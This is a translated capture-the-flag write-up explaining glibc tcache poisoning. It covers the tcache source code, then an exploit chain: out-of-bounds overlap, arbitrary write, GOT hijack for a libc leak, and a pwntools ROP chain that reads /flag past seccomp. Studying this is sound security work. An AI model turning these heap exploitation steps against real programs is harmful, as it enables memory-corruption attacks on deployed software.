A comprehensive article to help you understand tcache cache poisoning

The article was first published at https://xz.aliyun.com/t/12600

tcache Structure Analysis#

Tcache (Thread Cache) is a feature introduced in glibc (GNU C Library) starting from version 2.26, aimed at improving memory allocation performance. In tcache, each thread has its own cache, which can reduce mutex and lock contention between threads.

By default, chunks smaller than or equal to 1032 (0x408) bytes are placed in tcache.

Allocation and Deallocation: When a program performs a malloc operation, it first checks whether there are available chunks in tcache; if so, it returns directly. Similarly, when performing a free operation, if the chunk size meets the requirements and the corresponding tcache bin is not full (by default, each bin can hold 7 chunks), the chunk will be placed in tcache. Otherwise, it will follow the original process and be placed in the unsorted bin or other bins.

Data Structure: The data structure of Tcache is mainly an array, where each element is the head node of a singly linked list. The index of the array corresponds to the size of the chunk, meaning that the i-th element corresponds to the linked list of chunks of size (i+1)*16. Each node in the linked list is a free chunk, and the first field of the node stores a pointer to the next node.

The schematic diagram of the data structure of tcache in memory is as follows:

+----+    +------+     +------+
| 0  | -> | chunk| --> | chunk| --> NULL
+----+    +------+     +------+
| 1  | -> NULL
+----+ 
| 2  | -> | chunk| --> NULL
+----+    +------+
| .. | 
+----+
| n  | -> | chunk| --> | chunk| --> | chunk| --> NULL
+----+    +------+     +------+     +------+

Understanding tcache poisoning#

Let's first look at the basic attack idea of cache poisoning, with the core code as follows:

size_t stack_var; // Target poisoning address

intptr_t *a = malloc(128); // addr: 0x5555555592a0
intptr_t *b = malloc(128); // addr: 0x555555559330

free(a);
free(b);

b[0] = (intptr_t)&stack_var;  // tcache poisoning ！

intptr_t *c = malloc(128);

assert((long)&stack_var == (long)c); // At this point, we have gained read and write control over the stack address &stack_var

Now let's examine the changes in the heap memory layout at each stage.

Allocate two chunks consecutively, then free them; at this point, the freed chunks enter tcache management.

intptr_t *a = malloc(128); // addr: 0x5555555592a0
intptr_t *b = malloc(128); // addr: 0x555555559330

free(a);
free(b);

Check the heap memory layout at this point

The tcache linked list is somewhat like a stack, following the LIFO principle.

pwndbg> heapinfo
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x5555555593b0 (size : 0x20c50) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x0
(0x90)   tcache_entry[7](2): 0x555555559330 --> 0x5555555592a0 // The tcache_entry structure will be explained later

According to the memory layout mentioned above, the same size tcache is maintained through linked lists. Modify the pointer to point (to be analyzed later), so that the tcache linked list's pointer points to the address on the stack.

size_t stack_var; // addr: 0x7fffffffe508
b[0] = (intptr_t)&stack_var;

At this point, we observe the pointing of tcache_entry[7].

pwndbg> heapinfo
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x5555555593b0 (size : 0x20c50) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x0
(0x90)   tcache_entry[7](2): 0x555555559330 --> 0x7fffffffe508 --> 0x555555555410 (overlap chunk with 0x555555559320(freed) )

Request a tcache allocation; at this point, the previously freed b chunk is obtained.

At this point, the tcache has been

pwndbg> heapinfo
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x5555555593b0 (size : 0x20c50) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x0
(0x90)   tcache_entry[7](1): 0x7fffffffe508 --> 0x555555555410 (overlap chunk with 0x7fffffffe4f8(freed) )

The second tcache allocation is requested; originally, this would obtain the previous a chunk, but due to the change in the pointer of tcache, we can gain an opportunity to read and write to the address on the stack.

DraggedImage

To delve into its principles, we need to start from the corresponding source code in glibc:

Analyzing tcache from the Source Code#

The data structure of tcache is as follows:

/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct").  Keeping overall size low is mildly important.  Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

The tcache_entry structure is essentially a pointer to a singly linked list, and tcache_perthread_struct stores all tcache entries, with counts recording the number of each tcache chain.

The tcache poisoning vulnerability involves two functions:

Allocation function tcache_get
- Find the corresponding tcache_entry table entry
- Retrieve and return the head node of the linked list
Recycle function tcache_put
- Forcefully convert the chunk to tcache_entry structure
- Insert it into the corresponding tcache_entry table entry using the head insertion method
  Essentially, it implements a stack structure using a linked list, FIFO.

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]); // Corresponding tcache count decreases by 1
  return (void *) e;
}

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx]; // Insert new chunk using head insertion
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

The key line of code is:

tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

The macro chunk2mem is as follows, which moves the chunk pointer back to point to the user data area.

/* Convert a chunk address to a user mem pointer without correcting
   the tag.  */
#define chunk2mem(p) ((void*)((char*)(p) + CHUNK_HDR_SZ))

The critical point is that the code directly forcefully converts it to a tcache_entry structure, which means that the first 8 bytes (64 bits) of user data store the tcache next pointer.

This means we can directly modify the next pointer, thus gaining the opportunity to write to any address; therefore, utilizing tcache is actually simpler than fastbin.

Problem Analysis#

The problem has obvious vulnerabilities, namely that using oob can achieve overlap.

Utilizing `tcache poisoning`#

Let's calculate how we can achieve tcache poisoning.

First, we must have two tcache, referring to the previous example (we need one tcache to modify the pointer).
Secondly, we cannot directly modify the chunk pointer (the previous example was in the source code, so it could be modified directly), so we also need a fast way to modify the pointer through overlap.
Finally, to achieve the purpose of overlap, we need a block in front to achieve overlap through oob overflow.

malloc chunk#

Consecutively allocate 4 chunks, with the purposes of the 4 chunks as follows:

chunk1 leaks the heap base address + oob covers chunk2
chunk2 modifies the next pointer of chunk3, achieving tcache poisoning
chunk3 obtains a writable memory segment through the next pointer
chunk4 serves as a fill for the 0x40 tcache

DraggedImage-1

chunk1 oob to overlap#

Modify chunk1, oob modifies the size of chunk2
Free chunk4, filling it into the 0x40 tcache
The size of chunk2 is modified to 0x40, overlapping with chunk3
Modify the contents of chunk2 to overwrite the next pointer of chunk3

DraggedImage-2

Leak libc base#

The address of the books structure is fixed at 0x4040e0, with each book structure storing its size in the first 8 bytes and the chunk address in the next 8 bytes.

DraggedImage-3

When we gain arbitrary address writing, we can write content to the heap block at 0x4040e0, and then use rewrite_book to hijack the GOT table to leak the libc base addr.

The content we write is:

    edit(1, pwn.flat([
            # 1==
            0xff, # sz
            exe.sym.stdout, # target
            # 2==
            0x8, # sz
            exe.got.free, # target
            # 3==
            0x8, # sz
            exe.sym.secret_msg, # target
            # 4==
            0xff, # sz
            exe.sym.books # target
        ] + [0] * 0x60, filler = b"\x00"))

Observe the memory layout:

pwndbg> x/40gx 0x4040e0
0x4040e0 <books>:       0x00000000000000ff      0x00000000004040a0
0x4040f0 <books+16>:    0x0000000000000008      0x0000000000404018
0x404100 <books+32>:    0x0000000000000008      0x00000000004040c0
0x404110 <books+48>:    0x00000000000000ff      0x00000000004040e0
0x404120 <books+64>:    0x0000000000000000      0x0000000000000000
0x404130 <books+80>:    0x0000000000000000      0x0000000000000000
0x404140 <books+96>:    0x0000000000000000      0x0000000000000000
0x404150 <books+112>:   0x0000000000000000      0x0000000000000000

At this point, we can understand that:

The memory address of the first book is 0x4040a0 (which is actually the GOT entry for stdout) with size 0xff
The memory address of the second book is 0x404018 (which is actually the GOT entry for free) with size 0xff
The memory address of the third book is 0x4040c0 (which is actually the address of secret_msg), with size 0x8
The memory address of the fourth book is 0x4040e0 (which is actually the address of sym.books, convenient for secondary writing, with size 0xff

Thus, we can hijack the GOT entry for free to print the stdout@got entry, and then leak the libc base addr through a determined offset.

    # free@got => puts
    edit(2, b"".join([
            pwn.p64(exe.sym.puts)
        ]))

DraggedImage-4

ROP Bypass seccomp#

The program has seccomp protection, allowing only read, write, open, and exit.

Thus, we need to write ROP to the stack to read the flag, first calculating the stack frame.

Leaking the address of the environment variable to calculate the stack frame (note that the fourth book we previously set to point to itself, allowing for repeated editing).

    # leak stack (environ)
    edit(4, pwn.flat([
            # 1==
            0xff, # sz
            libc.sym.environ # target
        ], filler = b"\x00"))

Stack frame address: which is the ret address of the function calling this.

DraggedImage-5

After obtaining the stack frame address, we use the pwntools built-in ROP module to implement it.

rop = pwn.ROP(libc, base=stackframe_rewrite)

# setup the write to the rewrite stackframe
edit(4, pwn.flat([
        # 1==
        0xff, # sz
        stackframe_rewrite # target
    ], filler = b"\x00"))

# ROPchain
rop(rax=pwn.constants.SYS_open, rdi=stackframe_rewrite + 0xde + 2, rsi=pwn.constants.O_RDONLY) # open
rop.call(rop.find_gadget(["syscall", "ret"]))
rop(rax=pwn.constants.SYS_read, rdi=3, rsi=heap_leak, rdx=0x100) # file descriptor bf ...
rop.call(rop.find_gadget(["syscall", "ret"]))

rop(rax=pwn.constants.SYS_write, rdi=1, rsi=heap_leak, rdx=0x100) # write
rop.call(rop.find_gadget(["syscall", "ret"]))
rop.exit(0x1337)
rop.raw(b"/flag\x00")

EXP Debugging#

Due to the heap memory layout, the addresses may vary; here we record a debugging process:

Allocate 4 chunks#

The structure of the Book is as follows:

DraggedImage-6

Layout of the 4 chunks

DraggedImage-7

oob#

    # chunk2 => sz extended
    edit(1, b"K"*0x20)

At this point, the size of chunk2 has been modified.

DraggedImage-8

tcache poisoning#

At this point, the next pointer of tcache3 has been modified.

DraggedImage-9

Arbitrary Address Write#

Using tcache poisoning to modify the structure of books, the layout is as follows; thus, the utilization of tcache poisoning is complete.

DraggedImage-10

References#

how2heap/tcache_poisoning.c at master · shellphish/how2heap · GitHub